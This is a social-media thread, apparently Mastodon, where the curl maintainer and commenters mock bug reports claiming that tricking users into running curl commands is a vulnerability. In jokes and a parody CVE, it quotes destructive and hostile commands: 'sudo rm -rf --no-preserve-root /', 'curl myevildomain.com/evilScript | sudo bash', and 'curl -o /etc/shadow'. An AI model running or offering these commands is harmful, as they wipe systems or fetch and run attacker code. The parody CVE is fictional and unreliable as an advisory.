If you can trick a user to run a command tool in a way that ends up causing the user problems, that is not a security problem in that tool.

Just saying. In case you're thinking of submitting such a report about a command line tool in your toolbox.

But surely no sane person would. Right? Right?

the latest incarnation of this is someone saying that curl can be used to download a ".curlrc" into your $HOME and then curl might do bad things in subsequent invokes.

The first step is "just" to trick a user to run a curl command line doing the bad.

... if you can trick a user into running an arbitrary command, you can of course do so much more harm than just this.

@bagder It seems insane that anyone would lay blame for such occurrences at your feet but I'm sure you're received any number of these and more.

@thedoctor we get different variations of this reported with some interval, yes

@bagder I pasted `rm *' from some seedy-looking howto site, and now all my files are gone!

Can I use curl to get them back?!!

@bagder so what was it this time?

@bagder

CVE-2025-6978513: Arbitrary code execution in bash
Severity: 10

When opening bash and inputting a command provided by a malicious third party, arbitrary commands can be executed. This can, among other things, be used for privilege escalation, creation of backdoors, and downloading of malware.

Proof of concept:

1. Open bash
2. Run "sudo rm -rf --no-preserve-root /"

@mezzodrinker @bagder severity over 9000.

@bagder You gotta be kidding..

@bagder not having high hopes this will help a lot, but you could add to the program guidelines explicitly that those types are not a valid reports.
curl | bash - not valid!
curl -o /etc/shadow - not valid!

@faker We already have this pretty explicitly documented to not be a security problem:

A creative, misleading or funny looking command line is not a security problem. The curl command line tool takes options and URLs on the command line and if an attacker can trick the user to run a specifically crafted curl command line, all bets are off. Such an attacker can just as well have the user run a much worse command that can do something fatal (like `sudo rm -rf /`).

@bagder Sorry, you have more words for that than i have.

Layer-8-issues (behind the keyboard) cannot all be solved by software.

@bagder A variant of Raymond Chen's "other side of airtight hatchway" problem? :)

@bagder oh, I didn't even know about https://curl.se/dev/vuln-disclosure.html
I meant to add it here: https://hackerone.com/curl
Or link to your vulnerability disclosure policy from there.
Again, not holding my breath that people who report such "bugs" read those guidelines anyway...

@faker thanks for pointing this out, I added a link to the policy page now from the hackerone submission page.

@bagder Where's my "rm -rf --no-preserve-root /" RCE-through-user bounty!???

@bagder i can’t imagine dead ass submitting a report going “this tool that downloads remote files has a security vulnerability. people can download remote files with it and overwrite their existing files” like

tech news headline: NEW RCE IN CURL!!!1!!!

"if user executes the command curl myevildomain.com/evilScript | sudo bash hackers will take control of the user system

@gabboman @bagder I’ve seen unironic security reports like that

@bagder Well. Up to a limit. Imagine tool called sl that would change your password to abc123, enable ssh, and announce its actions on fedi..